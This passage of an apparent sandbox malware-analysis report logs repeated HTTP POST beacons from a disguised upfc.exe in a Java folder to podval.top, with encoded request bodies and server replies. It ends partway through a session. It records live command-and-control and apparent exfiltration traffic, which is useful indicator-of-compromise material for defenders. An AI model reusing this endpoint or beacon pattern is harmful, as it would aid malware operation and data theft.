                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    47192.168.2.1049764188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:46.951354980 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:47.307084084 CEST1060OUTData Raw: 5f 5a 5f 54 5b 5e 52 5f 58 56 55 51 50 5b 59 51 55 5b 5e 5e 51 58 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _Z_T[^R_XVUQP[YQU[^^QXSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!&<0,3V+Z>9V -:>365' ?8;[#[;"['$Y -
                                                    Jul 3, 2024 16:42:47.428067923 CEST25INHTTP/1.1 100 Continue


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    48192.168.2.1049765188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:47.735857010 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:48.088502884 CEST1772OUTData Raw: 5f 54 5f 5b 5e 5d 57 5b 58 56 55 51 50 5e 59 57 55 5c 5e 5c 51 5b 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _T_[^]W[XVUQP^YWU\^\Q[S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"2'_+37Z).4=-5'%=]$<,.#8_/,"['$Y
                                                    Jul 3, 2024 16:42:48.206337929 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:48.414809942 CEST727INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGqovOxBRhXcAfPqfZQW47wjm8pMU5%2FxMBafPzqY%2B7LMRWBotY6BT6SBL2T4poyphvywRvj0Utf7rc2gRs1kDocPRQGP9CcEGTbXpZOQfmmebQmeU2TW9gUMUefO"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4eb081741a9-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 26 06 31 14 36 03 32 32 01 1b 2e 2e 2f 53 3c 2d 28 5d 2c 2a 2a 02 3f 34 07 5b 2d 07 3d 08 22 39 2e 15 3c 12 38 14 31 0e 3f 08 35 31 20 5b 04 1c 23 59 2b 04 07 58 3c 38 2b 53 32 3f 32 1b 30 37 3d 13 30 15 2d 0c 24 5e 28 03 3f 01 26 09 30 1c 2f 1e 2a 5e 2e 1c 2a 24 36 1d 35 34 21 54 02 13 22 50 27 04 29 56 37 56 37 54 25 23 26 07 26 34 24 0b 24 30 2a 54 3e 1d 21 0d 24 22 3b 00 35 11 2f 1f 26 38 31 06 27 3d 3d 5d 36 02 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98&1622../S<-(],**?4[-="9.<81?51 [#Y+X<8+S2?207=0-$^(?&0/*^.*$654!T"P')V7V7T%#&&4$$0*T>!$";5/&81'==]6#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    49192.168.2.1049766188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:47.873372078 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:48.228888988 CEST1060OUTData Raw: 5f 5a 5a 58 5e 5f 52 5f 58 56 55 51 50 5a 59 52 55 51 5e 54 51 5b 53 5e 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _ZZX^_R_XVUQPZYRUQ^TQ[S^SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"%:$E0:#'')>5U4-[.=9]3&&$U3/.?[71 ,"['$Y )
                                                    Jul 3, 2024 16:42:48.323013067 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:48.675503016 CEST590INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=64u6bNfsD8a9qv9fI%2BD1gButqeV0zFVGOrK4zhci1S%2BusUc3%2Fn5V%2BiYV2DcyILLOM%2BsHcBIjYdGOLUY%2Bqek5M7%2FR5aFGHHamWhWZjBr6a1abW%2Bjx5or8y6BOluvn"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4ebbe2543bb-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    50192.168.2.1049767188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:48.810914040 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:49.170265913 CEST1060OUTData Raw: 5a 56 5f 5a 5b 5a 52 5c 58 56 55 51 50 50 59 54 55 5c 5e 54 51 54 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: ZV_Z[ZR\XVUQPPYTU\^TQTSVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"[%$?'38=)W [)Y->$!'?U,X84$_/"['$Y
                                                    Jul 3, 2024 16:42:49.256891966 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:49.598372936 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:49 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WIZKZS6IMvcYMQ%2Bs9NzWOsr82dUvdBCH8k48RjOgrcAtmtGutntWPaL9Q%2Bviuf3Z80IebEDsuZVZFSh8uDVLgLCWFNp1n3Pdzicw0x2l4b%2B0zyutdk%2BgTP%2BVpdEo"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4f19e0718ea-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    51192.168.2.1049768188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:49.736592054 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:50.088299036 CEST1060OUTData Raw: 5f 56 5f 5f 5b 5b 57 5d 58 56 55 51 50 5e 59 56 55 5d 5e 55 51 5e 53 56 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V__[[W]XVUQP^YVU]^UQ^SVSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^!%)')4'(.54.%Y."'*3U--#[ 14_8<"['$Y
                                                    Jul 3, 2024 16:42:50.180145979 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:50.525412083 CEST584INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:50 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=opADZT23yBp1%2B%2BFxaM3kDVAS4WNwsjYxSeMRa7skuJt5Mb0m5rLOIHPnwog%2FcTC3XlHtOw3K%2BGpiu4Tcwzt3wy4ZatVjatofaXjFmZikMCq%2FpW8NkXSYT5VQNqA2"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4f75b540fa5-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    52192.168.2.1049769188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:50.654637098 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:51.010195971 CEST1060OUTData Raw: 5f 50 5f 5d 5e 5d 52 58 58 56 55 51 50 58 59 56 55 5c 5e 5c 51 5b 53 5b 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _P_]^]RXXVUQPXYVU\^\Q[S[SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]2:8$9+_'0?>V7"..0%0 /X7Z "(X/,"['$Y !
                                                    Jul 3, 2024 16:42:51.117734909 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:51.483047009 CEST578INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:51 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wek2jbcshoJz7OvylBdIbeHl0gom1Wp8vvyuN4YragKTcS2wgGbMQiBkIqpLwtNN0S6pm3tGOp4OgVtDeYC3IeMy8BniyufnmNW7Gm1BEwsaqFW%2BDQbzAJyHMj%2BU"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a4fd3f658c1e-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    53192.168.2.1049770188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:51.651438951 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1056
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:52.010250092 CEST1056OUTData Raw: 5f 56 5f 55 5b 59 52 5b 58 56 55 51 50 59 59 52 55 59 5e 5d 51 54 53 59 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _V_U[YR[XVUQPYYRUY^]QTSYSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"2*$E':($#;)"#.=Z9..'5)Y'+W,8#T;;<"['$Y !
                                                    Jul 3, 2024 16:42:52.132659912 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:52.494422913 CEST576INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:52 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oSfE%2BHbZz1HhILsTFa4pKXU9gimNitEuRCJ01i6LzcPWFLmrSC3s9wobuUg1yVynTekAx4pdCnPIyYqYS70ncx5zpsjRJ1lxEFE0Q8fwHWJlidi1OVi7Xz4jgARr"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a5038ca94301-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    54192.168.2.1049771188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:52.624691010 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:52.979403019 CEST1060OUTData Raw: 5f 55 5f 55 5b 5c 57 5a 58 56 55 51 50 50 59 57 55 51 5e 5b 51 5e 53 5a 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _U_U[\WZXVUQPPYWUQ^[Q^SZSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"]&9 3#33 *=6729>35![00<;X<7(-,"['$Y
                                                    Jul 3, 2024 16:42:53.098740101 CEST25INHTTP/1.1 100 Continue


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    55192.168.2.1049772188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:53.429064989 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1772
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:53.775899887 CEST1772OUTData Raw: 5f 51 5a 5b 5b 58 57 5b 58 56 55 51 50 5c 59 53 55 5c 5e 55 51 5d 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _QZ[[XW[XVUQP\YSU\^UQ]S_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y190B$9?^$V(=6 59="$6%[0 7W--; 8^/"['$Y 1
                                                    Jul 3, 2024 16:42:53.884541988 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:54.104304075 CEST729INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:54 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMQGgzH7hSr0j37r0oUg8wZGEj8hsY7QIjMNG8K0ZcJ7iJcqJ1vmgF8KmNJ6KQ5veLRfuiU6Vp5yhYaO5L4un4DXOSMKvXI5YuYW2IZw%2BQ1%2Bkk%2FIlaQdBZ31ILsD"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a50e8f90c463-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 39 38 0d 0a 09 1a 25 58 27 29 2d 5a 26 1c 2b 1b 2c 2d 09 14 3c 3d 0e 5d 2d 3a 3a 04 3c 1d 21 59 3a 58 22 53 20 2a 21 05 2b 3c 30 5c 25 30 20 57 36 31 20 5b 04 1c 23 58 28 39 36 07 3c 01 27 1c 26 12 0f 0b 33 0e 29 11 33 3b 3a 11 24 5e 27 5d 2b 06 18 09 33 0c 27 59 2a 3b 31 00 2b 51 26 5e 35 34 21 54 02 13 21 0d 33 04 21 1c 23 23 34 0e 26 20 2a 01 24 34 30 0b 27 33 36 1f 2a 33 3a 55 26 31 3c 13 36 01 23 57 27 3b 25 07 33 3d 00 02 21 28 23 5f 2b 05 29 56 01 33 59 54 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 98%X')-Z&+,-<=]-::<!Y:X"S *!+<0\%0 W61 [#X(96<'&3)3;:$^']+3'Y*;1+Q&^54!T!3!##4& *$40'36*3:U&1<6#W';%3=!(#_+)V3YT0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    56192.168.2.1049773188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:53.598925114 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Jul 3, 2024 16:42:53.947949886 CEST1060OUTData Raw: 5f 55 5f 5e 5e 5b 57 59 58 56 55 51 50 51 59 52 55 5f 5e 5d 51 58 53 5f 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _U_^^[WYXVUQPQYRU_^]QXS_SA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Y%'0/^'0[=*#.>]'&%[$3/.Y47;<"['$Y
                                                    Jul 3, 2024 16:42:54.110841036 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:54.449040890 CEST582INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:54 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Muap3lfj%2FYvB%2FQE7TkM%2BfYcFAyPIw6P1Ha5Z7FeJ19eKTI5qX1iKfJgAKxdXMKSjIP8IpbXlXV1MGUyjSKUlFvJGMnJbzItDLPRMPj3VgUpj1qqcW%2Ft8cRBNb2iM"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a50fd8a14331-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 4;R\P0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    57192.168.2.1049774188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:54.578217983 CEST270OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                    Host: podval.top
                                                    Content-Length: 1060
                                                    Expect: 100-continue
                                                    Jul 3, 2024 16:42:54.932209015 CEST1060OUTData Raw: 5f 53 5a 58 5b 57 52 58 58 56 55 51 50 58 59 55 55 5d 5e 58 51 5d 53 57 53 41 5f 5c 50 5f 51 50 5e 5b 51 5e 56 5d 57 5e 58 51 5a 50 5f 57 5f 5b 52 50 59 5c 42 5b 52 59 50 5d 54 54 58 5d 57 44 59 56 43 50 5a 5a 58 53 5c 5d 5d 5f 44 5d 46 55 5f 57
                                                    Data Ascii: _SZX[WRXXVUQPXYUU]^XQ]SWSA_\P_QP^[Q^V]W^XQZP_W_[RPY\B[RYP]TTX]WDYVCPZZXS\]]_D]FU_WY_WY]]VRPZ\^[ZQ[XP\ZCR]\XU[]CZZFQQ\SQVQTYVZWBZ_X]V_]]YZY^Y_X\\QXP]TZ__\]D^[_RY]\[Y^[^SP]U[[RY[\^U^Y[\^"Z'*<$/\3?* .)0:$U 8./42 _8"['$Y !
                                                    Jul 3, 2024 16:42:55.052855015 CEST25INHTTP/1.1 100 Continue
                                                    Jul 3, 2024 16:42:55.412673950 CEST579INHTTP/1.1 200 OK
                                                    Date: Wed, 03 Jul 2024 14:42:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vOlZVERodDFL431e6pUWoU6Yk9r8xP0nS7LIq%2BdUaRpJ1sVWet1OW0El%2FHJd7f%2FKtqVJGRLB0%2FPz3Q6Kw8Ftt54dh1u6LO5%2B6VN3bhUEx6JKHckeoiobKrOTpodJ"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    Server: cloudflare
                                                    CF-RAY: 89d7a515cc7e4366-EWR
                                                    alt-svc: h2=":443"; ma=60
                                                    Data Raw: 34 0d 0a 3b 52 5c 50 0d 0a
                                                    Data Ascii: 4;R\P
                                                    Jul 3, 2024 16:42:55.506344080 CEST5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    58192.168.2.1049776188.114.97.3806960C:\Program Files (x86)\Java\jre-1.8\upfc.exe
                                                    TimestampBytes transferredDirectionData
                                                    Jul 3, 2024 16:42:55.641944885 CEST294OUTPOST /LineToPythonJsLowupdateLongpollWindowsFlower.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
